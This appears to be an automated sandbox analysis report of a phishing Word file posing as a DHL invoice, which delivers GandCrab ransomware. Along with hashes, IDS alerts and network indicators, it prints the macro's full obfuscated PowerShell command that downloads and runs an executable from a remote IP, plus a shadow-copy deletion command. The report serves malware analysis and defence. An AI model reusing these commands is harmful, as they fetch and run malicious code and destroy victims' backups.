File name:	DHL Invoice139789.doc
Full analysis:	https://app.any.run/tasks/1c9c1410-9ba7-48ac-ba23-78a18aa994ff
Verdict:	Malicious activity
Threats:	GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Malware Trends Tracker >>>
Analysis date:	March 15, 2019, 03:42:58
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:	macros macros-on-open loader ransomware gandcrab trojan
Indicators:
MIME:	application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info:	Microsoft Word 2007+
MD5:	B4FB16054F4DE42E19A5DA423494E48A
SHA1:	208BBA4B37C050891F3D500B6B9A9D790146C91C
SHA256:	3D8CCD6C2447851110B466AB40BE9AAE5E483562F391025A467D74A9A17CD748
SSDEEP:	384:Xsz8NDVzfPPBC6aeseFjrVGArOcipsWfRNxt/ZtNN8mWHTlQXJRaUry0sdMsVFem:XDzfPNahCjrIArsaW7xllNalodymsVFj

.docm	\|	Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx	\|	Word Microsoft Office Open XML Format document (24.2)
.zip	\|	Open Packaging Conventions container (18)
.zip	\|	ZIP compressed archive (4.1)

AppVersion:	16
HyperlinksChanged:	No
SharedDoc:	No
CharactersWithSpaces:	72
LinksUpToDate:	No
Company:	-
TitlesOfParts:	-
HeadingPairs:	Title 1
ScaleCrop:	No
Paragraphs:	1
Lines:	1
DocSecurity:	None
Application:	Microsoft Office Word
Characters:	63
Words:	10
Pages:	1
TotalEditTime:	1 minute
Template:	Normal.dotm
ModifyDate:	2019:03:14 19:41:00Z
CreateDate:	2019:03:14 19:37:00Z
RevisionNumber:	4
LastModifiedBy:	Admin
Keywords:	-

ZipFileName:	[Content_Types].xml
ZipUncompressedSize:	1585
ZipCompressedSize:	413
ZipCRC:	0x778ad904
ZipModifyDate:	1980:01:01 00:00:00
ZipCompression:	Deflated
ZipBitFlag:	0x0006
ZipRequiredVersion:	20

PID	CMD	Path	Indicators	Parent process
2452	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\DHL Invoice139789.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.5123.5000
2364	c:\windows\system32\cmd /c set p=power&& set s=shell&& call %p%%s% $HwJ8OPHkn = '$OOIRop = new-obj-331471616-1585575148-1163824152ect -com-331471616-1585575148-1163824152obj-331471616-1585575148-1163824152ect wsc-331471616-1585575148-1163824152ript.she-331471616-1585575148-1163824152ll;$V8Rju = new-object sys-331471616-1585575148-1163824152tem.net.web-331471616-1585575148-1163824152client;$YlDb6pu0t = new-object random;$ZQlhMemU8 = \"-331471616-1585575148-1163824152h-331471616-1585575148-1163824152t-331471616-1585575148-1163824152t-331471616-1585575148-1163824152p-331471616-1585575148-1163824152://205.185.118.194/rozita.exe\".spl-331471616-1585575148-1163824152it(\",\");$Kvunr = $YlDb6pu0t.nex-331471616-1585575148-1163824152t(1, 65536);$FH0gTbJD = \"c:\win-331471616-1585575148-1163824152dows\tem-331471616-1585575148-1163824152p\5.ex-331471616-1585575148-1163824152e\";for-331471616-1585575148-1163824152each($ufA8wBMUV in $ZQlhMemU8){try{$V8Rju.dow-331471616-1585575148-1163824152nlo-331471616-1585575148-1163824152adf-331471616-1585575148-1163824152ile($ufA8wBMUV.ToS-331471616-1585575148-1163824152tring(), $FH0gTbJD);sta-331471616-1585575148-1163824152rt-pro-331471616-1585575148-1163824152cess $FH0gTbJD;break;}catch{}}'.replace('-331471616-1585575148-1163824152', $BCq96WeZ);$hrvcIp = '';iex($HwJ8OPHkn);	c:\windows\system32\cmd.exe	—	WINWORD.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2984	powershell $HwJ8OPHkn = '$OOIRop = new-obj-331471616-1585575148-1163824152ect -com-331471616-1585575148-1163824152obj-331471616-1585575148-1163824152ect wsc-331471616-1585575148-1163824152ript.she-331471616-1585575148-1163824152ll;$V8Rju = new-object sys-331471616-1585575148-1163824152tem.net.web-331471616-1585575148-1163824152client;$YlDb6pu0t = new-object random;$ZQlhMemU8 = \"-331471616-1585575148-1163824152h-331471616-1585575148-1163824152t-331471616-1585575148-1163824152t-331471616-1585575148-1163824152p-331471616-1585575148-1163824152://205.185.118.194/rozita.exe\".spl-331471616-1585575148-1163824152it(\",\");$Kvunr = $YlDb6pu0t.nex-331471616-1585575148-1163824152t(1, 65536);$FH0gTbJD = \"c:\win-331471616-1585575148-1163824152dows\tem-331471616-1585575148-1163824152p\5.ex-331471616-1585575148-1163824152e\";for-331471616-1585575148-1163824152each($ufA8wBMUV in $ZQlhMemU8){try{$V8Rju.dow-331471616-1585575148-1163824152nlo-331471616-1585575148-1163824152adf-331471616-1585575148-1163824152ile($ufA8wBMUV.ToS-331471616-1585575148-1163824152tring(), $FH0gTbJD);sta-331471616-1585575148-1163824152rt-pro-331471616-1585575148-1163824152cess $FH0gTbJD;break;}catch{}}'.replace('-331471616-1585575148-1163824152', $BCq96WeZ);$hrvcIp = '';iex($HwJ8OPHkn);	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2760	"C:\windows\temp\5.exe"	C:\windows\temp\5.exe		powershell.exe
User: admin Company: Crystal Dew World Integrity Level: MEDIUM Description: Priority Glbalizatin Version: 2.3.4.6
3000	"C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet	C:\Windows\SysWOW64\cmd.exe	—	5.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 2 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1032	vssadmin delete shadows /all /quiet	C:\Windows\SysWOW64\vssadmin.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Command Line Interface for Microsoft® Volume Shadow Copy Service Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID	Process	Filename		Type
2452	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVR8C2.tmp.cvr		—
		MD5:—	SHA256:—
2984	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C7K5D67E7S0V00NBHUMV.temp		—
		MD5:—	SHA256:—
2452	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~DF832572CD1F4310C1.TMP		—
		MD5:—	SHA256:—
2452	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~DFD3CD35EAADB4592E.TMP		—
		MD5:—	SHA256:—
2760	5.exe	C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp		—
		MD5:—	SHA256:—
2452	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat		text
		MD5:278FB7C1DCF278998E260F2E2437943F	SHA256:B76626569DF8703127BB545C57D4FC408C02415CDF637A1AC77DBAD378C2CA56
2760	5.exe	C:\Users\admin\SJMWAP-MANUAL.txt		text
		MD5:3480F22CA139EFB78187DF0DD0D4C15D	SHA256:C6778385DA3A5AE389208B452BBC5F26BBF077A741B5A16866B35E846A46D36E
2760	5.exe	C:\$Recycle.Bin\S-1-5-21-3896776584-4254864009-862391680-1000\SJMWAP-MANUAL.txt		text
		MD5:3480F22CA139EFB78187DF0DD0D4C15D	SHA256:C6778385DA3A5AE389208B452BBC5F26BBF077A741B5A16866B35E846A46D36E
2984	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF1c199a.TMP		binary
		MD5:F0B43C161C484A510A2FACA640F77C34	SHA256:51E790E773C2E1288194BD2A1609D7B39C5AFBB765EA3F79D0D0250A273247C0
2452	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd		tlb
		MD5:A7D6CA8DFDCCBD88C9B27712B1AFA97D	SHA256:23385B696B381F44527703714881342FD0CDBC0B1F71987520EC83379AD9D0AB

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2984	powershell.exe	GET	200	205.185.118.194:80	http://205.185.118.194/rozita.exe	US	executable	413 Kb	suspicious
2760	5.exe	POST	404	107.173.49.208:443	https://www.kakaocorp.link/uploads/tmp/imkeesda.jpg	US	html	601 b	malicious
2760	5.exe	GET	301	107.173.49.208:80	http://www.kakaocorp.link/	US	html	162 b	malicious

PID	Process	Class	Message
2984	powershell.exe	A Network Trojan was detected	ET INFO Executable Download from dotted-quad Host
2984	powershell.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
2984	powershell.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2984	powershell.exe	Potentially Bad Traffic	ET INFO SUSPICIOUS Dotted Quad Host MZ Response

Description:	-
Creator:	admin
Subject:	-
Title:	-

General Info

DHL Invoice139789.doc

B4FB16054F4DE42E19A5DA423494E48A

208BBA4B37C050891F3D500B6B9A9D790146C91C

3D8CCD6C2447851110B466AB40BE9AAE5E483562F391025A467D74A9A17CD748

384:Xsz8NDVzfPPBC6aeseFjrVGArOcipsWfRNxt/ZtNN8mWHTlQXJRaUry0sdMsVFem:XDzfPNahCjrIArsaW7xllNalodymsVFj

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Application was dropped or rewritten from another process

Downloads executable files from IP

Executes PowerShell scripts

Downloads executable files from the Internet

Starts CMD.EXE for commands execution

Unusual execution from Microsoft Office

Writes file to Word startup folder

Deletes shadow copies

Renames files like Ransomware

Dropped file may contain instructions of ransomware

GANDCRAB detected

SUSPICIOUS

Creates files in the user directory

Creates files in the Windows directory

Reads the machine GUID from the registry

Executable content was dropped or overwritten

Starts CMD.EXE for commands execution

INFO

Creates files in the user directory

Reads the machine GUID from the registry

Dropped object may contain Bitcoin addresses

Reads Microsoft Office registry keys

Dropped object may contain TOR URL's

Malware configuration

Static information

TRiD

EXIF

XML

XMP

ZIP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings